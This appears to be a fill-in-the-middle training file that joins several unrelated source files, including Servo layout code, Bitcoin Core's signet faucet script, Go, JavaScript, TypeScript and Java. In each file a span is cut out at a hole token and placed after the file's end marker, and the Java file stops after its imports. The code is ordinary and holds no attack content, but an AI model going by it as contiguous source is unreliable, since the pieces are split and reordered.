InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT); } } } } /// Returns true if any of the inline styles associated with this fragment have /// `vertical-align` set to `top` or `bottom`. pub fn is_vertically_aligned_to_top_or_bottom(&self) -> bool { match self.style.get_box().vertical_align { VerticalAlign::Top | VerticalAlign::Bottom => return true, _ => {} } if let Some(ref inline_context) = self.inline_context { for node in &inline_context.nodes { match node.style.get_box().vertical_align { VerticalAlign::Top | VerticalAlign::Bottom => return true, _ => {} } } } false } pub fn is_text_or_replaced(&self) -> bool { match self.specific { SpecificFragmentInfo::Generic | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper => false, SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Svg(_) | SpecificFragmentInfo::UnscannedText(_) => true } } /// Returns the 4D matrix representing this fragment's transform. pub fn transform_matrix(&self, stacking_relative_border_box: &Rect<Au>) -> Option<Transform3D<f32>> { let list = &self.style.get_box().transform; let transform = list.to_transform_3d_matrix(Some(stacking_relative_border_box)).ok()?.0; let transform_origin = &self.style.get_box().transform_origin; let transform_origin_x = transform_origin.horizontal .to_used_value(stacking_relative_border_box.size.width) .to_f32_px(); let transform_origin_y = transform_origin.vertical .to_used_value(stacking_relative_border_box.size.height) .to_f32_px(); let transform_origin_z = transform_origin.depth.px(); let pre_transform = Transform3D::create_translation(transform_origin_x, transform_origin_y, transform_origin_z); let post_transform = Transform3D::create_translation(-transform_origin_x, -transform_origin_y, -transform_origin_z); Some(pre_transform.pre_mul(&transform).pre_mul(&post_transform)) } /// Returns the 4D matrix representing this fragment's perspective. pub fn perspective_matrix(&self, stacking_relative_border_box: &Rect<Au>) -> Option<Transform3D<f32>> { match self.style().get_box().perspective { Either::First(length) => { let perspective_origin = self.style().get_box().perspective_origin; let perspective_origin = Point2D::new( perspective_origin.horizontal .to_used_value(stacking_relative_border_box.size.width) .to_f32_px(), perspective_origin.vertical .to_used_value(stacking_relative_border_box.size.height) .to_f32_px()); let pre_transform = Transform3D::create_translation(perspective_origin.x, perspective_origin.y, 0.0); let post_transform = Transform3D::create_translation(-perspective_origin.x, -perspective_origin.y, 0.0); let perspective_matrix = transform::create_perspective_matrix(length.px()); Some(pre_transform.pre_mul(&perspective_matrix).pre_mul(&post_transform)) } Either::Second(values::None_) => { None } } } } impl fmt::Debug for Fragment { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { let border_padding_string = if !self.border_padding.is_zero() { format!(" border_padding={:?}", self.border_padding) } else { "".to_owned() }; let margin_string = if !self.margin.is_zero() { format!(" margin={:?}", self.margin) } else { "".to_owned() }; let damage_string = if self.restyle_damage != RestyleDamage::empty() { format!(" damage={:?}", self.restyle_damage) } else { "".to_owned() }; write!(f, "{}({}) [{:?}] border_box={:?}{}{}{}", self.specific.get_type(), self.debug_id, self.specific, self.border_box, border_padding_string, margin_string, damage_string) } } bitflags! { struct QuantitiesIncludedInIntrinsicInlineSizes: u8 { const INTRINSIC_INLINE_SIZE_INCLUDES_MARGINS = 0x01; const INTRINSIC_INLINE_SIZE_INCLUDES_PADDING = 0x02; const INTRINSIC_INLINE_SIZE_INCLUDES_BORDER = 0x04; const INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED = 0x08; } } bitflags! { // Various flags we can use when splitting fragments. See // `calculate_split_position_using_breaking_strategy()`. struct SplitOptions: u8 { #[doc = "True if this is the first fragment on the line."] const STARTS_LINE = 0x01; #[doc = "True if we should attempt to split at character boundaries if this split fails. \ This is used to implement `overflow-wrap: break-word`."] const RETRY_AT_CHARACTER_BOUNDARIES = 0x02; } } /// A top-down fragment border box iteration handler. pub trait FragmentBorderBoxIterator { /// The operation to perform. fn process(&mut self, fragment: &Fragment, level: i32, overflow: &Rect<Au>); /// Returns true if this fragment must be processed in-order. If this returns false, /// we skip the operation for this fragment, but continue processing siblings. fn should_process(&mut self, fragment: &Fragment) -> bool; } /// The coordinate system used in `stacking_relative_border_box()`. See the documentation of that /// method for details. #[derive(Clone, Debug, PartialEq)] pub enum CoordinateSystem { /// The border box returned is relative to the fragment's parent stacking context. Parent, /// The border box returned is relative to the fragment's own stacking context, if applicable. Own, } pub struct InlineStyleIterator<'a> { fragment: &'a Fragment, inline_style_index: usize, primary_style_yielded: bool, } impl<'a> Iterator for InlineStyleIterator<'a> { type Item = &'a ComputedValues; fn next(&mut self) -> Option<&'a ComputedValues> { if !self.primary_style_yielded { self.primary_style_yielded = true; return Some(&*self.fragment.style) } let inline_context = self.fragment.inline_context.as_ref()?; let inline_style_index = self.inline_style_index; if inline_style_index == inline_context.nodes.len() { return None } self.inline_style_index += 1; Some(&*inline_context.nodes[inline_style_index].style) } } impl<'a> InlineStyleIterator<'a> { fn new(fragment: &Fragment) -> InlineStyleIterator { InlineStyleIterator { fragment: fragment, inline_style_index: 0, primary_style_yielded: false, } } } #[derive(Clone, Copy, Debug, PartialEq)] pub enum WhitespaceStrippingResult { RetainFragment, FragmentContainedOnlyBidiControlCharacters, FragmentContainedOnlyWhitespace, } impl WhitespaceStrippingResult { fn from_unscanned_text_fragment_info(info: &UnscannedTextFragmentInfo) -> WhitespaceStrippingResult { if info.text.is_empty() { WhitespaceStrippingResult::FragmentContainedOnlyWhitespace } else if info.text.chars().all(gfx::text::util::is_bidi_control) { WhitespaceStrippingResult::FragmentContainedOnlyBidiControlCharacters } else { WhitespaceStrippingResult::RetainFragment } } } /// The overflow area. We need two different notions of overflow: paint overflow and scrollable /// overflow. #[derive(Clone, Copy, Debug)] pub struct Overflow { pub scroll: Rect<Au>, pub paint: Rect<Au>, } impl Overflow { pub fn new() -> Overflow { Overflow { scroll: Rect::zero(), paint: Rect::zero(), } } pub fn from_rect(border_box: &Rect<Au>) -> Overflow { Overflow { scroll: *border_box, paint: *border_box, } } pub fn union(&mut self, other: &Overflow) { self.scroll = self.scroll.union(&other.scroll); self.paint = self.paint.union(&other.paint); } pub fn translate(&mut self, by: &Vector2D<Au>) { self.scroll = self.scroll.translate(by); self.paint = self.paint.translate(by); } } bitflags! { pub struct FragmentFlags: u8 { // TODO(stshine): find a better name since these flags can also be used for grid item. /// Whether this fragment represents a child in a row flex container. const IS_INLINE_FLEX_ITEM = 0b0000_0001; /// Whether this fragment represents a child in a column flex container. const IS_BLOCK_FLEX_ITEM = 0b0000_0010; /// Whether this fragment represents the generated text from a text-overflow clip. const IS_ELLIPSIS = 0b0000_0100; } } /// Specified distances from the margin edge of a block to its content in the inline direction. /// These are returned by `guess_inline_content_edge_offsets()` and are used in the float placement /// speculation logic. #[derive(Clone, Copy, Debug)] pub struct SpeculatedInlineContentEdgeOffsets { pub start: Au, pub end: Au, } #[cfg(not(debug_assertions))] #[derive(Clone)] struct DebugId; #[cfg(debug_assertions)] #[derive(Clone)] struct DebugId(u16); #[cfg(not(debug_assertions))] impl DebugId { pub fn new() -> DebugId { DebugId } } #[cfg(debug_assertions)] impl DebugId { pub fn new() -> DebugId { DebugId(layout_debug::generate_unique_debug_id()) } } #[cfg(not(debug_assertions))] impl fmt::Display for DebugId { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{:p}", &self) } } #[cfg(debug_assertions)] impl fmt::Display for DebugId { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.0) } } #[cfg(not(debug_assertions))] impl Serialize for DebugId { fn serialize<S: Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> { serializer.serialize_str(&format!("{:p}", &self)) } } #[cfg(debug_assertions)] impl Serialize for DebugId { fn serialize<S: Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> { serializer.serialize_u16(self.0) } }<|fim▁end|>
fn scanned_text(scanned_text_fragment_info: &mut ScannedTextFragmentInfo, border_box: &mut LogicalRect<Au>)
<|file_name|>getcoins.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3 # Copyright (c) 2020-2021 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. import argparse import io import requests import subprocess import sys DEFAULT_GLOBAL_FAUCET = 'https://signetfaucet.com/claim' DEFAULT_GLOBAL_CAPTCHA = 'https://signetfaucet.com/captcha' GLOBAL_FIRST_BLOCK_HASH = '00000086d6b2636cb2a392d45edc4ec544a10024d30141c9adf4bfd9de533b53' # braille unicode block BASE = 0x2800 BIT_PER_PIXEL = [ [0x01, 0x08], [0x02, 0x10], [0x04, 0x20], [0x40, 0x80], ] BW = 2 BH = 4 # imagemagick or compatible fork (used for converting SVG) CONVERT = 'convert' class PPMImage: ''' Load a PPM image (Pillow-ish API). ''' def __init__(self, f): if f.readline() != b'P6\n': raise ValueError('Invalid ppm format: header') line = f.readline() (width, height) = (int(x) for x in line.rstrip().split(b' ')) if f.readline() != b'255\n': raise ValueError('Invalid ppm format: color depth') data = f.read(width * height * 3) stride = width * 3 self.size = (width, height) self._grid = [[tuple(data[stride * y + 3 * x:stride * y + 3 * (x + 1)]) for x in range(width)] for y in range(height)] def getpixel(self, pos): return self._grid[pos[1]][pos[0]] def print_image(img, threshold=128): '''Print black-and-white image to terminal in braille unicode characters.''' x_blocks = (img.size[0] + BW - 1) // BW y_blocks = (img.size[1] + BH - 1) // BH for yb in range(y_blocks): line = [] for xb in range(x_blocks): ch = BASE for y in range(BH): for x in range(BW): try: val = img.getpixel((xb * BW + x, yb * BH + y)) except IndexError: pass else: if val[0] < threshold: ch |= BIT_PER_PIXEL[y][x] line.append(chr(ch)) print(''.join(line)) <|fim▁hole|>parser = argparse.ArgumentParser(description='Script to get coins from a faucet.', epilog='You may need to start with double-dash (--) when providing bitcoin-cli arguments.') parser.add_argument('-c', '--cmd', dest='cmd', default='bitcoin-cli', help='bitcoin-cli command to use') parser.add_argument('-f', '--faucet', dest='faucet', default=DEFAULT_GLOBAL_FAUCET, help='URL of the faucet') parser.add_argument('-g', '--captcha', dest='captcha', default=DEFAULT_GLOBAL_CAPTCHA, help='URL of the faucet captcha, or empty if no captcha is needed') parser.add_argument('-a', '--addr', dest='addr', default='', help='Bitcoin address to which the faucet should send') parser.add_argument('-p', '--password', dest='password', default='', help='Faucet password, if any') parser.add_argument('-n', '--amount', dest='amount', default='0.001', help='Amount to request (0.001-0.1, default is 0.001)') parser.add_argument('-i', '--imagemagick', dest='imagemagick', default=CONVERT, help='Path to imagemagick convert utility') parser.add_argument('bitcoin_cli_args', nargs='*', help='Arguments to pass on to bitcoin-cli (default: -signet)') args = parser.parse_args() if args.bitcoin_cli_args == []: args.bitcoin_cli_args = ['-signet'] def bitcoin_cli(rpc_command_and_params): argv = [args.cmd] + args.bitcoin_cli_args + rpc_command_and_params try: return subprocess.check_output(argv).strip().decode() except FileNotFoundError: print('The binary', args.cmd, 'could not be found.') exit(1) except subprocess.CalledProcessError: cmdline = ' '.join(argv) print(f'-----\nError while calling "{cmdline}" (see output above).') exit(1) if args.faucet.lower() == DEFAULT_GLOBAL_FAUCET: # Get the hash of the block at height 1 of the currently active signet chain curr_signet_hash = bitcoin_cli(['getblockhash', '1']) if curr_signet_hash != GLOBAL_FIRST_BLOCK_HASH: print('The global faucet cannot be used with a custom Signet network. Please use the global signet or setup your custom faucet to use this functionality.\n') exit(1) else: # For custom faucets, don't request captcha by default. if args.captcha == DEFAULT_GLOBAL_CAPTCHA: args.captcha = '' if args.addr == '': # get address for receiving coins args.addr = bitcoin_cli(['getnewaddress', 'faucet', 'bech32']) data = {'address': args.addr, 'password': args.password, 'amount': args.amount} # Store cookies # for debugging: print(session.cookies.get_dict()) session = requests.Session() if args.captcha != '': # Retrieve a captcha try: res = session.get(args.captcha) except: print('Unexpected error when contacting faucet:', sys.exc_info()[0]) exit(1) # Convert SVG image to PPM, and load it try: rv = subprocess.run([args.imagemagick, '-', '-depth', '8', 'ppm:-'], input=res.content, check=True, capture_output=True) except FileNotFoundError: print('The binary', args.imagemagick, 'could not be found. Please make sure ImageMagick (or a compatible fork) is installed and that the correct path is specified.') exit(1) img = PPMImage(io.BytesIO(rv.stdout)) # Terminal interaction print_image(img) print('Enter captcha: ', end='') data['captcha'] = input() try: res = session.post(args.faucet, data=data) except: print('Unexpected error when contacting faucet:', sys.exc_info()[0]) exit(1) # Display the output as per the returned status code if res: # When the return code is in between 200 and 400 i.e. successful print(res.text) elif res.status_code == 404: print('The specified faucet URL does not exist. Please check for any server issues/typo.') elif res.status_code == 429: print('The script does not allow for repeated transactions as the global faucet is rate-limitied to 1 request/IP/day. You can access the faucet website to get more coins manually') else: print(f'Returned Error Code {res.status_code}\n{res.text}\n') print('Please check the provided arguments for their validity and/or any possible typo.')<|fim▁end|>
<|file_name|>context.go<|end_file_name|><|fim▁begin|>// Copyright (c) 2016 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package tchannelthrift import ( stdctx "context" "time" "github.com/m3db/m3/src/x/context" apachethrift "github.com/apache/thrift/lib/go/thrift" "github.com/uber/tchannel-go" "github.com/uber/tchannel-go/thrift" ) const ( contextKey = "m3dbcontext" ) // RegisterServer will register a tchannel thrift server and create and close M3DB contexts per request func RegisterServer(channel *tchannel.Channel, service thrift.TChanServer, contextPool context.Pool) { server := thrift.NewServer(channel) server.Register(service, thrift.OptPostResponse(postResponseFn)) server.SetContextFn(func(ctx stdctx.Context, method string, headers map[string]string) thrift.Context { xCtx := contextPool.Get() xCtx.SetGoContext(ctx) ctxWithValue := stdctx.WithValue(ctx, contextKey, xCtx) //nolint: staticcheck return thrift.WithHeaders(ctxWithValue, headers) }) } // NewContext returns a new thrift context and cancel func with embedded M3DB context func NewContext(timeout time.Duration) (thrift.Context, stdctx.CancelFunc) { tctx, cancel := thrift.NewContext(timeout) xCtx := context.NewWithGoContext(tctx) ctxWithValue := stdctx.WithValue(tctx, contextKey, xCtx) //nolint: staticcheck return thrift.WithHeaders(ctxWithValue, nil), cancel } // Context returns an M3DB context from the thrift context<|fim▁hole|>func Context(ctx thrift.Context) context.Context { return ctx.Value(contextKey).(context.Context) } func postResponseFn(ctx stdctx.Context, method string, response apachethrift.TStruct) { value := ctx.Value(contextKey) inner := value.(context.Context) inner.Close() }<|fim▁end|>
<|file_name|>inherited_text.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ use parsing::parse; use style::values::generics::text::Spacing; #[test] fn negative_letter_spacing_should_parse_properly() { use style::properties::longhands::letter_spacing; use style::values::specified::length::{FontRelativeLength, Length, NoCalcLength}; let negative_value = parse_longhand!(letter_spacing, "-0.5em"); let expected = Spacing::Value(Length::NoCalc(NoCalcLength::FontRelative( FontRelativeLength::Em(-0.5), ))); assert_eq!(negative_value, expected); } #[test] fn negative_word_spacing_should_parse_properly() { use style::properties::longhands::word_spacing; use style::values::specified::length::{FontRelativeLength, LengthOrPercentage, NoCalcLength}; let negative_value = parse_longhand!(word_spacing, "-0.5em"); let expected = Spacing::Value(LengthOrPercentage::Length(NoCalcLength::FontRelative( FontRelativeLength::Em(-0.5), ))); assert_eq!(negative_value, expected); } #[test] fn line_height_should_return_number_on_plain_zero() { use style::properties::longhands::line_height; let result = parse(line_height::parse, "0").unwrap(); assert_eq!(result, parse_longhand!(line_height, "0")); } #[test] fn line_height_should_return_length_on_length_zero() { use style::properties::longhands::line_height; let result = parse(line_height::parse, "0px").unwrap();<|fim▁hole|>}<|fim▁end|>
assert_eq!(result, parse_longhand!(line_height, "0px"));
<|file_name|>interpreter.js<|end_file_name|><|fim▁begin|>import * as Error from '../error'; import * as Ast from './ast'; import * as ScopeHandler from './scopeHandler'; import * as TypeSystem from './typeSystem'; const evaluateBlock = (scope, ast) => { return ast.map((expr) => { return evaluateExpression(scope, expr); }); }; const evaluateExpression = (scope, astExpr) => { let output; switch(astExpr.node) { case 'LETDEFINITION': output = handleLetDefinition(scope, astExpr); break; case 'FUNCTIONDEFINITION': output = handleFunctionDefinition(scope, astExpr); break; case 'BODY': output = handleBody(scope, astExpr); break; case 'VARIABLE': output = handleVariable(scope, astExpr); break; case 'LAMBDA': output = handleLambda(scope, astExpr); break; case 'IF': output = handleIf(scope, astExpr); break; case 'IFELSE': output = handleIfElse(scope, astExpr); break; case 'APPLICATION': output = handleApplicationExpression(scope, astExpr); break; case 'BOOLEAN': output = astExpr; break; case 'UNDEFINED': output = astExpr; break; case 'NUMBER': output = astExpr; break; case 'STRING': output = astExpr; break; case 'SYMBOL': output = astExpr; break; case 'NOTE': output = astExpr; break; case 'BEAT': output = astExpr; break; case 'LIST': output = handleList(scope, astExpr); break; case 'MAP': output = handleMap(scope, astExpr); break; case 'MAPPAIR': output = handleMapPair(scope, astExpr); break; default: throw Error.create( Error.types.invalidAST, `AST Expression not valid: ${astExpr.node}` ); } return output; }; const handleLetDefinition = (scope, define) => { const defName = define.name; const defValue = evaluateExpression(scope, define.expression); ScopeHandler.set(scope, defName, defValue); return defValue; }; const handleFunctionDefinition = (scope, funcDef) => { const name = funcDef.name; const argNames = funcDef.argNames; const argTypes = funcDef.argTypes; const body = funcDef.body; const func = Ast.Func(argNames, argTypes, body); ScopeHandler.set(scope, name, func); return func; }; const handleBody = (scope, body) => { evaluateBlock(scope, body.definitions); return evaluateBlock(scope, body.expressions); }; const handleVariable = (scope, variable) => { return ScopeHandler.get(scope, variable.name); }; const handleLambda = (scope, lambda) => { return Ast.Closure( lambda.argNames, lambda.argTypes, lambda.body, scope ); }; const handleIf = (scope, ifNode) => { const predicate = evaluateExpression(scope, ifNode.predicate); let value; if (predicate === true || predicate !== 0) { value = evaluateBlock(scope, ifNode.expression); } else { value = false; } return value; }; const handleIfElse = (scope, ifElse) => { const predicate = evaluateExpression(scope, ifElse.predicate); let value; if (predicate === true || predicate !== 0) { value = evaluateBlock(scope, ifElse.trueExpression); } else { value = evaluateBlock(scope, ifElse.falseExpression); } return value; }; const handleApplicationExpression = (scope, application) => { const target = evaluateExpression(scope, application.target); const applicationArgs = application.args; const evaluatedArgs = applicationArgs.map((arg) => { return evaluateExpression(scope, arg); }); return handleApplication(scope, target, evaluatedArgs); }; const handleApplication = (scope, application, evaluatedArgs) => { if (!TypeSystem.checkFunctionTypes(application, evaluatedArgs)) { throw Error.create( Error.types.type, `Invalid types in application` ); } let result; switch (application.node) { case 'FUNCTION': result = handleFunction( scope, application, evaluatedArgs ); break; case 'BUILTIN': result = handleBuiltIn( scope, application, evaluatedArgs ); break; case 'CLOSURE': result = handleFunction( application.scope, application, evaluatedArgs ); break; default: throw Error.create( Error.types.application, `Application node not valid: ${application.node}` ); } return result; }; const handleFunction = (scope, func, functionArgs) => { const functionArgNames = func.argNames; const functionBody = func.body; if (functionArgs.length !== functionArgNames.length) { throw Error.create( Error.types.application, 'Incorrect argument number' ); } let childScope = ScopeHandler.createChildScope(scope); for (let i = 0; i < functionArgNames.length; i += 1) { ScopeHandler.set(childScope, functionArgNames[i], functionArgs[i]); } return evaluateExpression(childScope, functionBody); }; const handleBuiltIn = (scope, builtIn, functionArgs) => { const func = builtIn.func; if (functionArgs.length !== func.length) { throw Error.create( Error.types.application, 'Incorrect argument number' ); } const childScope = ScopeHandler.createChildScope(scope); // function args have already been evaluated return func.apply(childScope, functionArgs); }; const handleList = (scope, list) => { return Ast.List( list.values.map((lExp) => { return evaluateExpression(scope, lExp); }) );<|fim▁hole|> return Ast.Map( map.entries.map((mExp) => { return evaluateExpression(scope, mExp); }) ); }; const handleMapPair = (scope, pair) => { return { k: evaluateExpression(scope, pair.key), v: evaluateExpression(scope, pair.value) }; }; // scope is a dictionary, stored in and passed in by the Core export const evaluate = (scope, ast) => { evaluateBlock(scope, ast); }; export const apply = (scope, closure, args) => { handleApplication(scope, closure, args); };<|fim▁end|>
}; const handleMap = (scope, map) => {
<|file_name|>video.ts<|end_file_name|><|fim▁begin|>/*{# Copyright (c) 2012 Turbulenz Limited #}*/ /* * @title: Video playback * @description: * This sample shows how to play a video into a texture. */ /*{{ javascript("jslib/observer.js") }}*/ /*{{ javascript("jslib/requesthandler.js") }}*/ /*{{ javascript("jslib/utilities.js") }}*/ /*{{ javascript("jslib/services/turbulenzservices.js") }}*/ /*{{ javascript("jslib/services/turbulenzbridge.js") }}*/ /*{{ javascript("jslib/services/gamesession.js") }}*/ /*{{ javascript("jslib/services/mappingtable.js") }}*/ /*global TurbulenzEngine: true */ /*global TurbulenzServices: false */ /*global RequestHandler: false */ TurbulenzEngine.onload = function onloadFn() { var graphicsDevice = TurbulenzEngine.createGraphicsDevice({}); // IE detection while WebGL implementation is incomplete if (graphicsDevice && graphicsDevice.renderer === "Internet Explorer") { window.alert("The video sample is not supported on Internet Explorer"); return; } var soundDevice = TurbulenzEngine.createSoundDevice({}); var mathDevice = TurbulenzEngine.createMathDevice({}); var requestHandler = RequestHandler.create({}); var video; var videoPosition = -1; var shader, technique; var texture; var clearColor = mathDevice.v4Build(0, 0, 0, 1); var clipSpace = mathDevice.v4Build(1, -1, 0, 0); var videoColor = mathDevice.v4Build(1, 1, 1, 1); var primitive = graphicsDevice.PRIMITIVE_TRIANGLE_STRIP; var semantics = graphicsDevice.createSemantics(['POSITION', 'TEXCOORD0']); var vertexBuffer = graphicsDevice.createVertexBuffer({ numVertices: 4, attributes: [graphicsDevice.VERTEXFORMAT_FLOAT2, graphicsDevice.VERTEXFORMAT_FLOAT2], dynamic: false, data: [ -1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0, -1.0, 0.0, 0.0, 1.0, -1.0, 1.0, 0.0 ] }); var source = soundDevice.createGlobalSource({ looping: true }); var sound; var assetsToLoad = 3; function mappingTableReceived(mappingTable) { var videoURL; if (graphicsDevice.isSupported("FILEFORMAT_WEBM")) { videoURL = mappingTable.getURL("videos/turbulenzanimation.webm"); } else { videoURL = mappingTable.getURL("videos/turbulenzanimation.mp4"); } graphicsDevice.createVideo({ src: videoURL, looping: true, onload: function (v) { if (v) { video = v; assetsToLoad -= 1; } else { window.alert("Failed to load video!"); } } }); var soundURL; if (soundDevice.isSupported("FILEFORMAT_OGG")) { soundURL = mappingTable.getURL("sounds/turbulenzanimation.ogg"); } else { soundURL = mappingTable.getURL("sounds/turbulenzanimation.mp3"); } soundDevice.createSound({ src: soundURL, onload : function (s) { if (s) { sound = s; assetsToLoad -= 1; } else { window.alert('Failed to load sound!'); } } }); function shaderLoaded(shaderText) { if (shaderText) { var shaderParameters = JSON.parse(shaderText); shader = graphicsDevice.createShader(shaderParameters); technique = shader.getTechnique("video"); assetsToLoad -= 1; } else { window.alert("Failed to load shader!"); } } requestHandler.request({ src: mappingTable.getURL("shaders/video.cgfx"), onload: shaderLoaded }); } var gameSession; function sessionCreated() { TurbulenzServices.createMappingTable( requestHandler, gameSession, mappingTableReceived ); } gameSession = TurbulenzServices.createGameSession(requestHandler, sessionCreated); //========================================================================== // Main loop. //========================================================================== var fpsElement = document.getElementById("fpscounter"); var lastFPS = ""; var nextUpdate = 0; function displayPerformance() { var currentTime = TurbulenzEngine.time; if (currentTime > nextUpdate) { nextUpdate = (currentTime + 0.1); var fpsText = (graphicsDevice.fps).toFixed(2); if (lastFPS !== fpsText) { lastFPS = fpsText; fpsElement.innerHTML = fpsText + " fps"; } } } function mainLoop() { soundDevice.update(); if (graphicsDevice.beginFrame()) { var deviceWidth = graphicsDevice.width; var deviceHeight = graphicsDevice.height; var aspectRatio = (deviceWidth / deviceHeight); var videoWidth = video.width; var videoHeight = video.height; var videoAspectRatio = (videoWidth / videoHeight); <|fim▁hole|> y = aspectRatio / videoAspectRatio; } else //if (aspectRatio >= videoAspectRatio) { x = videoAspectRatio / aspectRatio; y = 1; } var currentVideoPosition = video.tell; if (currentVideoPosition && videoPosition !== currentVideoPosition) { if (currentVideoPosition < videoPosition) { // looped, sync source.seek(videoPosition); } videoPosition = currentVideoPosition; texture.setData(video); } graphicsDevice.clear(clearColor); graphicsDevice.setTechnique(technique); technique.texture = texture; technique.clipSpace = mathDevice.v4Build(x, -y, 0, 0, clipSpace); technique.color = videoColor; graphicsDevice.setStream(vertexBuffer, semantics); graphicsDevice.draw(primitive, 4); graphicsDevice.endFrame(); if (fpsElement) { displayPerformance(); } } } var intervalID; function loadingLoop() { if (assetsToLoad === 0) { TurbulenzEngine.clearInterval(intervalID); source.play(sound); video.play(); texture = graphicsDevice.createTexture({ width: video.width, height: video.height, mipmaps: false, format: 'R8G8B8', dynamic: true, data: video }); videoPosition = video.tell; intervalID = TurbulenzEngine.setInterval(mainLoop, 1000 / 60); } } intervalID = TurbulenzEngine.setInterval(loadingLoop, 100); // Create a scene destroy callback to run when the window is closed TurbulenzEngine.onunload = function destroyScene() { TurbulenzEngine.clearInterval(intervalID); if (texture) { texture.destroy(); texture = null; } if (shader) { shader.destroy(); technique = null; shader = null; } if (video) { video.destroy(); video = null; } if (vertexBuffer) { vertexBuffer.destroy(); vertexBuffer = null; } if (source) { source.destroy(); source = null; } if (sound) { sound.destroy(); sound = null; } fpsElement = null; if (gameSession) { gameSession.destroy(); gameSession = null; } }; };<|fim▁end|>
var x, y; if (aspectRatio < videoAspectRatio) { x = 1;
<|file_name|>wsgi.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2 # -*- coding: utf-8 -*-<|fim▁hole|>from dr import app if __name__ == '__main__': app.run()<|fim▁end|>
<|file_name|>UserListModalEntry.tsx<|end_file_name|><|fim▁begin|>import * as React from "react"; import FollowButton from "../FollowButton"; import SimilarityScore from "../SimilarityScore"; import { SimilarUsersModalProps } from "./SimilarUsersModal"; export type UserListModalEntryProps = { mode: "follow-following" | "similar-users"; user: ListenBrainzUser | SimilarUser; loggedInUser: ListenBrainzUser | null; apiUrl: string; loggedInUserFollowsUser: boolean; updateFollowingList: (<|fim▁hole|> action: "follow" | "unfollow" ) => void; }; const UserListModalEntry = (props: UserListModalEntryProps) => { const { mode, user, loggedInUserFollowsUser, loggedInUser, updateFollowingList, apiUrl, } = props; return ( <> <div key={user.name}> <div> <a href={`/user/${user.name}`} target="_blank" rel="noopener noreferrer" > {user.name} </a> {loggedInUser && mode === "similar-users" && ( <SimilarityScore similarityScore={(user as SimilarUser).similarityScore} user={user} type="compact" /> )} </div> {loggedInUser && ( <FollowButton type="block" user={user} apiUrl={apiUrl} loggedInUser={loggedInUser} loggedInUserFollowsUser={loggedInUserFollowsUser} updateFollowingList={updateFollowingList} /> )} </div> </> ); }; export default UserListModalEntry;<|fim▁end|>
user: ListenBrainzUser,
<|file_name|>NormalSwaptionExpiryStrikeVolatilities.java<|end_file_name|><|fim▁begin|>/* * Copyright (C) 2015 - present by OpenGamma Inc. and the OpenGamma group of companies * * Please see distribution for license. */ package com.opengamma.strata.pricer.swaption; import java.io.Serializable; import java.time.LocalDate; import java.time.ZonedDateTime; import java.util.Map; import java.util.NoSuchElementException; import java.util.Optional; import java.util.OptionalInt; import org.joda.beans.Bean; import org.joda.beans.BeanBuilder; import org.joda.beans.ImmutableBean; import org.joda.beans.JodaBeanUtils; import org.joda.beans.MetaBean; import org.joda.beans.MetaProperty; import org.joda.beans.gen.BeanDefinition; import org.joda.beans.gen.ImmutableConstructor; import org.joda.beans.gen.PropertyDefinition; import org.joda.beans.impl.direct.DirectMetaBean; import org.joda.beans.impl.direct.DirectMetaProperty; import org.joda.beans.impl.direct.DirectMetaPropertyMap; import org.joda.beans.impl.direct.DirectPrivateBeanBuilder; import com.opengamma.strata.basics.date.DayCount; import com.opengamma.strata.collect.ArgChecker; import com.opengamma.strata.data.MarketDataName; import com.opengamma.strata.market.ValueType; import com.opengamma.strata.market.param.CurrencyParameterSensitivities; import com.opengamma.strata.market.param.CurrencyParameterSensitivity; import com.opengamma.strata.market.param.ParameterMetadata; import com.opengamma.strata.market.param.ParameterPerturbation; import com.opengamma.strata.market.param.UnitParameterSensitivity; import com.opengamma.strata.market.sensitivity.PointSensitivities; import com.opengamma.strata.market.sensitivity.PointSensitivity; import com.opengamma.strata.market.surface.InterpolatedNodalSurface; import com.opengamma.strata.market.surface.Surface; import com.opengamma.strata.market.surface.SurfaceInfoType; import com.opengamma.strata.market.surface.Surfaces; import com.opengamma.strata.pricer.impl.option.NormalFormulaRepository; import com.opengamma.strata.product.common.PutCall; import com.opengamma.strata.product.swap.type.FixedFloatSwapConvention; 